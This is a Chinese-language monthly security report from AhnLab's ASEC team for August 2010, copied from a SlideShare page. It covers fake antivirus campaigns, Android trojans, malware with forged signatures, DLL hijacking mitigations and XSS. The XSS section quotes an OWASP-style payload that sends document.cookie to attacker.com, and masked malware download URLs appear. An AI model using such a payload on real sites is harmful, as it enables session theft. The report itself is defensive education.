SlideShare ist ein Scribd-Unternehmen logo

安博士Asec 2010年8月安全报告

A
ahnlabchina
1 von 19
Downloaden Sie, um offline zu lesen
2010 ASEC Report Vol.08 安博士公司的安全响应中心(ASEC, AhnLab Secur ity Emergency Response Center)是以病毒分析师 及安全专家组成的全球性安全响应组织。此报告书 是由安博士公司的ASEC制作,且包含每月发生的主 要安全威胁与响应这些威胁的最新安全技术的简要 信息。 详细内容可以在[www.ahn.com.cn]里确认。 ASEC 2010-09-13
I. 本月安全疫情 1. 病毒趋势…………………………………………………………3 2. 安全趋势…………………………………………………………10 3. 网络安全趋势……………………………………………………17
Ⅰ. 每月安全趋势 1. 病毒趋势 ■ 诱导安装虚假杀毒软件的邮件 本月最流行的木马是通过附加到邮件的执行文件或脚本文件来进行传播的虚假杀毒软 件。 邮件格式如下: [图 1-1] 诱导安装虚假杀毒软件的邮件 脚本文件一般是以加密的形式来附加到邮件,因此很难辨别出其包含的内容。 而且此 类文件是.html 文件格式,用户会很容易中招。如执行该文件,会连接到包含 Windows 帮助文档漏洞的网站。目前发现的此类文件很多会连接成人用品广告网站。 附加到邮 件的可执行文件一般安装以下虚假杀毒软件。
[图 1-2] 虚假杀毒软件 最近通过邮件来进行传播的虚假杀毒软非常流行。 我们认为这些虚假杀毒软件是通过 僵尸网络进行传播的。我们推测通过僵尸网络进行传播的虚假邮件和垃圾邮件会更加 疯狂。 所以如受到此类邮件,直接删除也是一种很好的预防措施。 ■ 伪装成正常杀软的虚假杀软 本月发现伪装成正常杀毒软件的虚假杀毒软件。 一旦用户打开网页浏览器,该虚假 杀毒软件会弹出以下警告窗口。可以看到该杀毒软件伪装成有名杀毒软件的界面。 [图 1-3] 伪装正常杀毒软件检测结果的界面
如用户点击‘Apply actions’,会弹出虚假的修复界面。但是实际上不会进行删除或 修复。之后虚假杀毒软件显示如下界面,有些还伪装成有名的在线文件检测网站 Virus total。 其他变种的界面如下: [图 1-4] 诱导安装虚假杀毒软件的界面 [图 1-4]里标记为 Free Install 的杀毒软件是虚假杀毒软件。 Red Cross Peak Protection 2010 Pest Detector Major Defense Kit Antispysafequard 而且其他杀毒软件的检测结果也是伪装的,希望用户不要被此上当受骗。虚假杀毒软 件逐渐进化,越来越隐蔽地给用户造成损失。如上介绍过,有些虚假杀毒软件还开始 伪装成有名的正常杀毒软件。虽然虚假杀毒软件在安全领域是很老的话题, 但是因受 到金钱的诱惑,病毒制作者会持续精密设计自己的虚假杀毒软件,所以我们继续会关 注此类案件。 ■ 智能手机病毒的出现
2010 年 8 月开始发现驻留于基于 Android 平台智能手机的病毒。8 月份发现 3 种类型 的 基 于 Android 平 台 的 智 能 手 机 。 Android-Trojan/Ewalls 会不经过用户同意泄漏 SIM 等个人敏感信息。制作公司辩解称是为了开发更优秀的软 件而收集信息,但是有些敏感信息是可能会违法。关于该病毒下面会详细解释。 Android-Trojan/SmsSend 是伪装成视频播放器的病毒,实际上并不包含视频播放 功能 。 它的主要功能是不经过用户同意,向收费 SMS(Short Message Service) 发送消息。Android-Trojan/Snake 是伪装成游戏,并泄漏用户的位置信息 的 木 马 。 实际具有游戏功能,但是玩游戏时不经过用户同意传送用户的位置信息。本月发现的 智能手机病毒都是运行在 Android 平台上的木马,而且具有不经过用户同意传送个人 信息的功能。用户下载智能手机应用程序并安装以前,必须得明确的确认,而且要仔 细查看以往用户的评价,确认没有恶意因素以后再进行安装。 ■ Android 背景界面应用程序里插入的病毒代码 V3 Mobile 产品里诊断为 Android-Spyware/EWalls 的 Android 背景软件里发现泄漏 个人信息的功能。图 1-5 是运行诊断名为 Android-Spyware/EWall 的应用程序时截取 的界面。 [图 1-5] 应用程序运行界面 运行具有信息泄漏功能(图 1-5)的恶意应用程序时会收集用户信息,并通过网络发 送 。 以下图 1-10 是 V3 Mobile 产品里检测为 Android-Spyware/Ewalls 的恶 意应用程序。
[图 1-6] V3 Mobile 产品里检测恶意应用程序时的界面
■ 盗用卡巴电子签名的病毒 最近国外发现盗用电子签名的病毒。7 月份在韩国也发现为了在各大门户网站上进行 传播,伪造某企业电子签名的木马。 但是这次所发现的木马所使用的伪造签名方式, 于以往伪造普通企业签名的手法有所不同,使用的是卡巴斯基的签名。 [图 1-7] 盗用卡巴斯基签名的木马 这次发现的木马所使用的所有卡巴斯基电子签名都过了有效期。所以可以把有效期作 为判断木马的参考。但是如果木马伪造一般企业的电子签名或盗取实际使用在签名里 的密钥时问题会变的很严重。实际上 7 月 19 日所发现的利用 Windows Shell 漏洞的 Stuxnet,其 Rootkit 驱动文件使用某特定企业的加密密钥做了签名。伪装卡巴斯基电 子签名的木马在 V3 产品群里的诊断名如下: Win-Trojan/Zbot.117736 Win-Trojan/Agent.122856.B Win-Trojan/Zbot.138216
■ 伪装成虚假 Adobe Flash Player 升级的恶意代码 在 8 月 11 日,发现了从海外制作的虚假 Adobe Flash Player 升级包通过网站传播恶 意代码。本次被发现的虚假 Adobe Flash Player 升级网站是 Adobe 公司为了解决最 新漏洞,发布安全更新时发现的。所以需要大家注意。虚假 Adobe Flash Plyaer 升 级包网站制作成真实的 Adobe Flash Plyaer 升级官网一样,在一般用户的角度上具 有难以判别是不是虚假的特点。 [图 1–8] 虚假 Adobe Flash Player 升级网站 在该虚假网站上点击上面标红色区域块会下载以下如 install_flash_player.exe (25,088 字节) 的文件。 [图 1–9] 虚假 Adobe Flash Player 升级网站 发布的恶意代码 下载的文件是恶意代码,执行该文件在正常的 svhost.exe 文件的内存领域里注入自身 的代码而且下载安装虚假杀软其它变种恶意代码。
本次被发现的虚假 Adobe Flash Player 升级网站中发布的恶意代码在 V3 产品系列诊 断为如下: Win-Trojan/Injector.25088.K 有了像这次通过虚假网站发布恶意代码的实例后,升级软件时应当通过该产品直接进 行升级,或通过网站进行升级时,事先确认好网站地址,是不是该产品的官方网站。 需用户谨慎注意。
2. 安全趋势 ■ ATM(自动柜员机, AutomatedTeller Machine)漏洞 本次在 BlackHat2010 和 DEFCON18 上 发表了 ATM 存在漏洞的内容。发表者 在现场给 大家演示攻击 ATM 并在画面上显示 JackPot,而且惊人的是在 ATM 机械上出无数的钞 票。 [图 2-1] ATM 攻击试验现场 (图片-wired.com) 攻击类型大致分为 , 利用 ATM 管理功能漏洞远程攻击方法和 ATM 机械自身连接 USB 端口等攻击。在发表中关于自身漏洞上按照技术角度上没有详细的说明但是足以证明 的一点是跟电脑一样同样可以受到攻击的。 [图 2-2] 被攻击的 ATM 状况 (图片-securityweek.com)
幸亏 发表者所发现的漏洞没有应用在所有 ATM 机械上而是指定的机械,该漏洞已经告 诉给 ATM 制作者而且解决此楼哦对那个。但是不仅仅该 ATM 机械,还有其他的 ATM 制 造商也存在同样的问题所以需要关注。 ■ DLL Hijacking 漏洞 最近报道最新漏洞信息的网站上有很多关于DLL劫持相关的内容。 应用程序在不指定完全限定路径的情况下动态加载DLL时,Windows将尝试在一组明确 定义的目录中查找此DLL。这组目录称为DLL搜索路径。Windows在目录中找到该DLL后 就会加载该DLL。如果Windows按DLL搜索顺序没有在任何目录中找到DLL,则会在DLL在 家操作返回一个失败结果。 LoadLibrary函数和LoadLibraryEx函数用于动态加载DLL。下面是着两个函数的DLL搜 索顺序。 1. 程序执行目录 2. 系统目录 3. 16位系统目录 4. Windows目录 5. 当前工作目录 (CWD) 6. PATH环境变量中列出的目录 [图 2-3] DLL Hijacking 劫持 利用新引入的 CWDIllegalInDllSearch 注册表项 , 计算机管理员可以修改 LoadLibrary 和 LoadLibraryEx 所使用的 DLL 搜索路径算法的行为。此注册表 项可以允许跳过某些类型的目录。 可以在以下路径中添加 CWDIllegalInDllSearch 注册表项: 将此注册表项用于计算机上的所有应用程序: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession Manager
将此注册表项用于计算机上的特定应用程序: HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options<application binary name> 每应用程序注册表项始终覆盖系统范围设置。这允许严格设置系统范围设置。然 后,可以为没有正确使用系统范围设置的任何应用程序设置应用程序设置。 例如,管理员可以通过将系统范围的设置设置为 2 来阻止从 WebDAV 和 SMB 加 载 DLL,然后再通过将“图像文件执行选项”设置为 0 或 1 来更改要求此加载 行为的特定应用程序的行为。 CWDIllegalInDllSearch 注册表项的值按如下方式修改 LoadLibrary 和 LoadLibraryEx 的行为 ■ 命令窗口游戏平台上运行的恶意代码 在DEFCON18 上发表了能在嵌入式系统运行的恶意代码相关的文章。此发表中,利用命 令窗口游戏机 NDS 和Wili如电脑一样可以麻痹网络 也可以攻击它人的机器,还有非 法下载游戏并运行,导致被感染的用户会受到不小的影响 [图 2-4] 原游戏病毒头 [图 2-5] 恶性代码嵌入的病毒头 还有,在电脑中运行的病毒一样,就像在嵌入式系统中运行自己想添加的代码,通告 在嵌入式系统中发生运行的代码,直接运行已被在Wii运行的病毒感染的游戏。发表者 制作的病毒是攻击home网络的共享器和用户电脑,麻痹网络,使用户电脑成为zommbie PC来添加到攻击者的Botnets.
[图 2-6] 通过被感染的游戏攻击 home 网络的演示 不仅仅是游戏机,最近国内有使用的 iPhone, Android phone 和同类 smart phone 也 发生类似的事情。所有要注意在网络违法共享的应用程序也会嵌入恶性代码。在这次 发表所主张的一样,从以前的 console 游戏机,在嵌入式系统也会像电脑不仅对自己 同时还会给其他人带来造成极大的影响,违法下载应用程序来使用的时候,由于恶性 代码不仅对嵌入式系统,还会对自己电脑及他人电脑,甚至对网络都会有着很大影 响。 ■ Imm32.dll patched 的恶性代码增加 在 8 月末,同样也出现了 patched imm32.dll 的恶性代码以及有着 AV-Killer 功能的 恶性代码。
[图 2-7] patched imm32.dll 的恶性代码周期 2010-08-21 ~ 2010-08-22 http://wow.*******.com/script/movie_ativex_patch.js http://*******.com/ads.htm http://*******.com/K.js http://*******.com/y.exe 2010-08-13 ~ 2010-08-16 http://wow.*******.com/script/movie_ativex_patch.js http://*******.com/a.htm http://*******.com/K.js http:/*******.com/n.exe [图 2-8] patched imm32.dll 的恶性代码内容
[图 2-9] patched imm32.dll 恶性代码状况(V3Lite 标准) 在[图 2-11]所说明的状况是仅在周末所发生的,到目前为止所奇迹的内容来说,比起 平时 PC 使用量也会增多,被感染的 PC 也没有及时进行升级。通过被攻击的网站蔓延 的恶性代码还会利用 MS10-042 漏洞的示例也会发生,所以用户要对此给予重视并且要 定期进行安全升级。
3. 网络安全动向 ■ OWASP 2010 TOP 2 Vol.07 是查看在 Vol.06 里概括查看的 OWASP 2010 Top10。来看一下 OWASP 2010 Top 2 XSS 攻击。 首先 XSS 攻击主要事项看一下下面图片。 [图 3-1] XSS 概括 1) 主要内容 Threat Agents(攻击者) : 包括内,外部用户,管理者。 发送一下无法信赖 的数据。 Attack Vectors(攻击路径) : 攻击者会传送在浏览器可以恶用 interpreter 的以 text 为基础的攻击代码。数据库里的数据和同样的内部代码都会被使用 为攻击路径。 Security Weakness(安全漏洞) : XSS 是广为人知的应用程序安全漏洞。XSS 漏洞是不会对应用程序做适当检查以及限制,用户所提供的数据包含在浏览器 传送的网页时发生的。XSS 是 Stored, Rflected 还有 DOM 基础的 XSS, 3 中 形式。大部分的 XSS 缺点是通过 text 或者代码分析,很容易了解到的。 Technical Impacts(技术影响) : 攻击者是利用用户 session 劫持,网页编 造,恶性 contents 注入,用户重定向,使用恶性代码,利用恶性代码来劫持 用户浏览器等来执行用户浏览器脚本。
Business Impacts(Business 影响) :顾虑受影响的系统和处理的所有数据的 Business 价值。并且也要顾虑漏洞对攻击所造成的影响。 2) 注入攻击例子 这个应用程序会没有检测或限制无法信赖的数据就是用 HTML 的。 (String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>"; 攻击者是在浏览器修改如下‘CC’变量: '><script>document.location='http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie</script>'. 还要注意攻击者可以利用 XSS 使 CSRF 防御失效。 3) 对应方法 要分离活性浏览器 contents 和无法信赖的数据。 提倡的方法是要限制无法信赖的数据包含的 HTML(body,attribute,javascrip t,CSS,URL)。在 UI Framework 里不执行限制处理,开发者要在应用程序中包 含限制处理。 适当的正规化与解码来执行正确或者检查white list来保护XSS,但是输入时 会需要特殊文字,所以不是一个完美的对应方法。像这样的情况,在允许输入 前把加密的所有输入进行解密,来检测长度、文字、初始化、数据相关的业 务。 到目前为止,对 OWASP 2010 TOP2 XSS 了解里一下。查看一下 refenrence。
[Reference] OWASP •OWASP XSS Prevention Cheat Sheet •OWASP Cross-Site Scripting Article •ESAPI Project Home Page •ESAPI Encoder API •ASVS: Output Encoding/Escaping Requirements (V6) •ASVS: Input Validation Requirements (V5) •Testing Guide: 1st 3 Chapters on Data Validation Testing •OWASP Code Review Guide: Chapter on XSS Review External •CWE Entry 79 on Cross-Site Scripting •RSnake’sXSS Attack Cheat Sheet

Empfohlen

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告
ahnlabchina
 
安博士Asec 2010年9月安全报告
安博士Asec 2010年9月安全报告安博士Asec 2010年9月安全报告
安博士Asec 2010年9月安全报告
ahnlabchina
 
安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告
ahnlabchina
 
安博士Asec 2010年5月安全报告
安博士Asec 2010年5月安全报告安博士Asec 2010年5月安全报告
安博士Asec 2010年5月安全报告
ahnlabchina
 
安博士Asec 2010年10月安全报告
安博士Asec 2010年10月安全报告安博士Asec 2010年10月安全报告
安博士Asec 2010年10月安全报告
ahnlabchina
 
Ict network security answers
Ict network security answersIct network security answers
Ict network security answers
Gary Tsang
 
Ict network security
Ict network securityIct network security
Ict network security
Gary Tsang
 
卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽 卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽
briian
 

Empfohlen

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告
ahnlabchina
 
安博士Asec 2010年9月安全报告
安博士Asec 2010年9月安全报告安博士Asec 2010年9月安全报告
安博士Asec 2010年9月安全报告
ahnlabchina
 
安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告安博士Asec 2010年6月安全报告
安博士Asec 2010年6月安全报告
ahnlabchina
 
安博士Asec 2010年5月安全报告
安博士Asec 2010年5月安全报告安博士Asec 2010年5月安全报告
安博士Asec 2010年5月安全报告
ahnlabchina
 
安博士Asec 2010年10月安全报告
安博士Asec 2010年10月安全报告安博士Asec 2010年10月安全报告
安博士Asec 2010年10月安全报告
ahnlabchina
 
Ict network security answers
Ict network security answersIct network security answers
Ict network security answers
Gary Tsang
 
Ict network security
Ict network securityIct network security
Ict network security
Gary Tsang
 
卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽 卡巴斯基個人版 7.0導覽
卡巴斯基個人版 7.0導覽
briian
 
黑站騎士
黑站騎士黑站騎士
黑站騎士
openblue
 
安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告
ahnlabchina
 
雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取
openblue
 
Ccns 網路基礎概論
Ccns 網路基礎概論 Ccns 網路基礎概論
Ccns 網路基礎概論
世平 梁
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤
jack51706
 
企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)
WASecurity
 
渗透测试思路技术与方法
渗透测试思路技术与方法渗透测试思路技术与方法
渗透测试思路技术与方法
 
雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取
OFMKT
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 
08
0808
08
chanlung wu
 
安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告
ahnlabchina
 
第一次使用Shodan.io就上手
第一次使用Shodan.io就上手第一次使用Shodan.io就上手
第一次使用Shodan.io就上手
Ting-En Lin
 
Tdohconf 2017-ncku
Tdohconf 2017-nckuTdohconf 2017-ncku
Tdohconf 2017-ncku
jack51706
 
8 3
8 38 3
8 3
Yuan Ting Zhang
 
Malware Introduction and Defense
Malware Introduction and DefenseMalware Introduction and Defense
Malware Introduction and Defense
Ni Zhiqiang
 
PIC_Experience2
PIC_Experience2PIC_Experience2
PIC_Experience2
ray chen
 
感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種
eric19972
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)
Lucas Ko
 
Android软件安全审计及漏洞修复经验谈.宋申雷
Android软件安全审计及漏洞修复经验谈.宋申雷Android软件安全审计及漏洞修复经验谈.宋申雷
Android软件安全审计及漏洞修复经验谈.宋申雷
正炎 高
 
安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告
ahnlabchina
 
安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告
ahnlabchina
 

Weitere ähnliche Inhalte

Was ist angesagt?

安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告
ahnlabchina
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 
企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)
WASecurity
 
雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取
OFMKT
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
Tyler Chen
 
安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告
ahnlabchina
 
PIC_Experience2
PIC_Experience2PIC_Experience2
PIC_Experience2
ray chen
 
感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種
eric19972
 

Was ist angesagt? (20)

黑站騎士
黑站騎士黑站騎士
黑站騎士
 
安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告安博士Asec 2010年7月安全报告
安博士Asec 2010年7月安全报告
 
雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取雲端入侵:郵件攻擊與密碼竊取
雲端入侵:郵件攻擊與密碼竊取
 
Ccns 網路基礎概論
Ccns 網路基礎概論 Ccns 網路基礎概論
Ccns 網路基礎概論
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
 
台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤台科大網路鑑識課程 封包分析及中繼站追蹤
台科大網路鑑識課程 封包分析及中繼站追蹤
 
企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)企业安全应急响应与渗透反击V0.04(程冲)
企业安全应急响应与渗透反击V0.04(程冲)
 
渗透测试思路技术与方法
渗透测试思路技术与方法渗透测试思路技术与方法
渗透测试思路技术与方法
 
雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取雲端入侵 – 郵件攻擊與密碼竊取
雲端入侵 – 郵件攻擊與密碼竊取
 
資訊安全入門
資訊安全入門資訊安全入門
資訊安全入門
 
08
0808
08
 
安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告安博士Asec 2010年2月安全报告
安博士Asec 2010年2月安全报告
 
第一次使用Shodan.io就上手
第一次使用Shodan.io就上手第一次使用Shodan.io就上手
第一次使用Shodan.io就上手
 
Tdohconf 2017-ncku
Tdohconf 2017-nckuTdohconf 2017-ncku
Tdohconf 2017-ncku
 
8 3
8 38 3
8 3
 
Malware Introduction and Defense
Malware Introduction and DefenseMalware Introduction and Defense
Malware Introduction and Defense
 
PIC_Experience2
PIC_Experience2PIC_Experience2
PIC_Experience2
 
感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種感染性病毒橫行 盜遊器變種
感染性病毒橫行 盜遊器變種
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)
 
Android软件安全审计及漏洞修复经验谈.宋申雷
Android软件安全审计及漏洞修复经验谈.宋申雷Android软件安全审计及漏洞修复经验谈.宋申雷
Android软件安全审计及漏洞修复经验谈.宋申雷
 

Andere mochten auch

安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告
ahnlabchina
 
安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告
ahnlabchina
 
Clase 2 josue
Clase 2 josueClase 2 josue
Clase 2 josue
davinho99
 
Proceso cognitivo en de los sentidos
Proceso cognitivo en de los sentidosProceso cognitivo en de los sentidos
Proceso cognitivo en de los sentidos
YENALCE
 
Trabajo en excel
Trabajo en excelTrabajo en excel
Trabajo en excel
altorrez
 
Software libre
Software libreSoftware libre
Software libre
malon95
 
Glosario de qbasic ladriana
Glosario de qbasic ladrianaGlosario de qbasic ladriana
Glosario de qbasic ladriana
khjhjhjh
 
Proportzionaltazuna
ProportzionaltazunaProportzionaltazuna
Proportzionaltazuna
Kriistiinaa
 
Tema 7 costes_de_producción
Tema 7 costes_de_producciónTema 7 costes_de_producción
Tema 7 costes_de_producción
ManuelaEconomia
 
Edwin bryan morales escobar
Edwin bryan morales escobarEdwin bryan morales escobar
Edwin bryan morales escobar
Bryan Morales
 
Edwin bryan morales escobar
Edwin bryan morales escobarEdwin bryan morales escobar
Edwin bryan morales escobar
Bryan Morales
 

Andere mochten auch (20)

安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告安博士Asec 2010年3月安全报告
安博士Asec 2010年3月安全报告
 
安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告安博士Asec 2010年11月安全报告
安博士Asec 2010年11月安全报告
 
Paychex
PaychexPaychex
Paychex
 
Clase 2 josue
Clase 2 josueClase 2 josue
Clase 2 josue
 
Proceso cognitivo en de los sentidos
Proceso cognitivo en de los sentidosProceso cognitivo en de los sentidos
Proceso cognitivo en de los sentidos
 
Trabajo en excel
Trabajo en excelTrabajo en excel
Trabajo en excel
 
Presentacin1
Presentacin1Presentacin1
Presentacin1
 
Software libre
Software libreSoftware libre
Software libre
 
Software libre
Software libreSoftware libre
Software libre
 
I fly
I flyI fly
I fly
 
I fly
I flyI fly
I fly
 
Glosario de qbasic ladriana
Glosario de qbasic ladrianaGlosario de qbasic ladriana
Glosario de qbasic ladriana
 
Proportzionaltazuna
ProportzionaltazunaProportzionaltazuna
Proportzionaltazuna
 
Proportzionaltazuna
ProportzionaltazunaProportzionaltazuna
Proportzionaltazuna
 
Proportzionaltazuna
ProportzionaltazunaProportzionaltazuna
Proportzionaltazuna
 
Tema 7 costes_de_producción
Tema 7 costes_de_producciónTema 7 costes_de_producción
Tema 7 costes_de_producción
 
PAC 2 Creativitat Publicitària I
PAC 2 Creativitat Publicitària IPAC 2 Creativitat Publicitària I
PAC 2 Creativitat Publicitària I
 
Edwin bryan morales escobar
Edwin bryan morales escobarEdwin bryan morales escobar
Edwin bryan morales escobar
 
Edwin bryan morales escobar
Edwin bryan morales escobarEdwin bryan morales escobar
Edwin bryan morales escobar
 
Projecte easy pc
Projecte easy pcProjecte easy pc
Projecte easy pc
 

Ähnlich wie 安博士Asec 2010年8月安全报告

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告
ahnlabchina
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题
guest4ca427
 
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计
gb ku
 
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
Nicolas su
 
做好开源软件安全管理 帮您移开IoT认证的挡路石
做好开源软件安全管理 帮您移开IoT认证的挡路石做好开源软件安全管理 帮您移开IoT认证的挡路石
做好开源软件安全管理 帮您移开IoT认证的挡路石
Onward Security
 
安博士Asec 2010年4月安全报告
安博士Asec 2010年4月安全报告安博士Asec 2010年4月安全报告
安博士Asec 2010年4月安全报告
ahnlabchina
 
OWASPTop10ProactiveControls2016-Chinese
OWASPTop10ProactiveControls2016-ChineseOWASPTop10ProactiveControls2016-Chinese
OWASPTop10ProactiveControls2016-Chinese
Tony Hsu
 

Ähnlich wie 安博士Asec 2010年8月安全报告 (19)

安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告安博士Asec 2010年1月安全报告
安博士Asec 2010年1月安全报告
 
Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)Web应用安全:过去,现在,未来(Public Ver)
Web应用安全:过去,现在,未来(Public Ver)
 
Security threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonasSecurity threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonas
 
浏览器的跨域安全问题
浏览器的跨域安全问题浏览器的跨域安全问题
浏览器的跨域安全问题
 
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计
 
SYMANTEC CODE SIGNING 為您的軟體增加至關重要的安全功能
SYMANTEC CODE SIGNING 為您的軟體增加至關重要的安全功能SYMANTEC CODE SIGNING 為您的軟體增加至關重要的安全功能
SYMANTEC CODE SIGNING 為您的軟體增加至關重要的安全功能
 
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
 
开放源代码软件Media wiki成熟度评估
开放源代码软件Media wiki成熟度评估开放源代码软件Media wiki成熟度评估
开放源代码软件Media wiki成熟度评估
 
11/14王團研究室—安全大師王團論毒 in台中
11/14王團研究室—安全大師王團論毒 in台中11/14王團研究室—安全大師王團論毒 in台中
11/14王團研究室—安全大師王團論毒 in台中
 
[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hack[xKungFoo2012]Web Service Hack
[xKungFoo2012]Web Service Hack
 
淺談Android app之攻防思維
淺談Android app之攻防思維淺談Android app之攻防思維
淺談Android app之攻防思維
 
【HITCON FreeTalk】Supply Chain Attack
【HITCON FreeTalk】Supply Chain Attack【HITCON FreeTalk】Supply Chain Attack
【HITCON FreeTalk】Supply Chain Attack
 
Twitter Wanghongyang Backup Security 20090402 0713
Twitter Wanghongyang Backup Security 20090402 0713Twitter Wanghongyang Backup Security 20090402 0713
Twitter Wanghongyang Backup Security 20090402 0713
 
2011网络安全现状分析
2011网络安全现状分析2011网络安全现状分析
2011网络安全现状分析
 
做好开源软件安全管理 帮您移开IoT认证的挡路石
做好开源软件安全管理 帮您移开IoT认证的挡路石做好开源软件安全管理 帮您移开IoT认证的挡路石
做好开源软件安全管理 帮您移开IoT认证的挡路石
 
安博士Asec 2010年4月安全报告
安博士Asec 2010年4月安全报告安博士Asec 2010年4月安全报告
安博士Asec 2010年4月安全报告
 
常用开发工具介绍
常用开发工具介绍常用开发工具介绍
常用开发工具介绍
 
OWASPTop10ProactiveControls2016-Chinese
OWASPTop10ProactiveControls2016-ChineseOWASPTop10ProactiveControls2016-Chinese
OWASPTop10ProactiveControls2016-Chinese
 
2012 the botnet traffic forensics system
2012 the botnet traffic forensics system2012 the botnet traffic forensics system
2012 the botnet traffic forensics system
 

Mehr von ahnlabchina

安博士Utm性能参考
安博士Utm性能参考安博士Utm性能参考
安博士Utm性能参考
ahnlabchina
 
Training apc-4.0
Training apc-4.0Training apc-4.0
Training apc-4.0
ahnlabchina
 
Training apc-3.0
Training apc-3.0Training apc-3.0
Training apc-3.0
ahnlabchina
 
Training apc-3.0
Training apc-3.0Training apc-3.0
Training apc-3.0
ahnlabchina
 
Training ahn lab-scm
Training ahn lab-scmTraining ahn lab-scm
Training ahn lab-scm
ahnlabchina
 
Training ahn lab-scm
Training ahn lab-scmTraining ahn lab-scm
Training ahn lab-scm
ahnlabchina
 
White paper apc3.0
White paper apc3.0White paper apc3.0
White paper apc3.0
ahnlabchina
 
White paper apc4.0
White paper apc4.0White paper apc4.0
White paper apc4.0
ahnlabchina
 
White paper ahnlab scm
White paper ahnlab scmWhite paper ahnlab scm
White paper ahnlab scm
ahnlabchina
 
